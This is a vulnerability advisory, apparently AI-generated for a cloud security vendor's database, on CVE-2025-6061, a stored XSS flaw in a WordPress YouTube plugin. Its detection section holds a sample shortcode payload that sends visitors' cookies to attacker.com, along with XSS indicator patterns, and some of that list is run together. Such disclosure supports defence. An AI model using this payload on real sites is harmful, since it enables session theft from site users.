
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-6061 is a Stored Cross-Site Scripting (XSS) vulnerability in the kk Youtube Video plugin for WordPress. It affects all versions up to and including 0.2, where insufficient input sanitization and output escaping on user-supplied attributes in the kkytv shortcode allow authenticated attackers with contributor-level access or above to inject arbitrary web scripts into pages. The vulnerability was published on June 14, 2025, and carries a CVSS v3.1 base score of 6.4 (Medium), assigned by Wordfence (Wordfence, Red Hat CVE).
The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-site Scripting). The plugin's kkytv shortcode fails to properly sanitize user-supplied attributes before rendering them in HTML output, enabling stored XSS payloads to be persisted in the WordPress database and executed in victims' browsers upon page load. Exploitation requires at minimum contributor-level WordPress authentication, meaning the attacker must have an account with post-creation privileges. The vulnerable code can be reviewed in the plugin's source file on the WordPress plugin repository (WordPress Plugin Source, Wordfence).
Successful exploitation allows an authenticated attacker to inject persistent malicious JavaScript into WordPress pages, which executes in the browsers of any user who visits the affected page — including administrators. This can lead to session cookie theft, credential harvesting, unauthorized administrative actions (such as privilege escalation or backdoor installation), and defacement of site content. The changed scope (S:C) in the CVSS vector reflects that the impact extends beyond the plugin itself to affect site visitors' browsers (Wordfence).
No public exploit code or active in-the-wild exploitation has been reported for CVE-2025-6061 as of the available data. The EPSS score is approximately 0.029%, indicating a low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires authenticated access at contributor level or above, which limits the attack surface compared to unauthenticated vulnerabilities (Wordfence, Red Hat CVE).
/wp-content/plugins/kk-youtube-video/readme.txt.kkytv shortcode with a malicious attribute payload, e.g., [kkytv id="<script>document.location='https://attacker.com/steal?c='+document.cookie</script>"].wp-admin/post.php or wp-json/wp/v2/posts containing kkytv shortcode with encoded or obfuscated script tags in the request body.wp_posts table entries containing [kkytv shortcode with embedded <script>, javascript:, or event handler attributes (e.g., onerror, onload) in post content.kkytv shortcode, potentially carrying cookie or session data in query parameters./wp-content/plugins/kk-youtube-video/ that may indicate post-exploitation tampering.As of the available data, no patched version of the kk Youtube Video plugin beyond 0.2 has been confirmed. Site administrators should deactivate and remove the kk Youtube Video plugin immediately if it is installed. As a workaround, restrict contributor-level and above user registrations to trusted individuals, and consider using a WordPress security plugin (such as Wordfence) with a firewall rule to block exploitation attempts. Monitor the WordPress plugin repository for an updated version and apply it promptly when available (Wordfence).
Wordfence identified and reported this vulnerability, publishing it in their weekly WordPress vulnerability report for the period of June 9–15, 2025. No significant broader media coverage or notable researcher commentary beyond the Wordfence disclosure has been observed (Wordfence Weekly Report).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."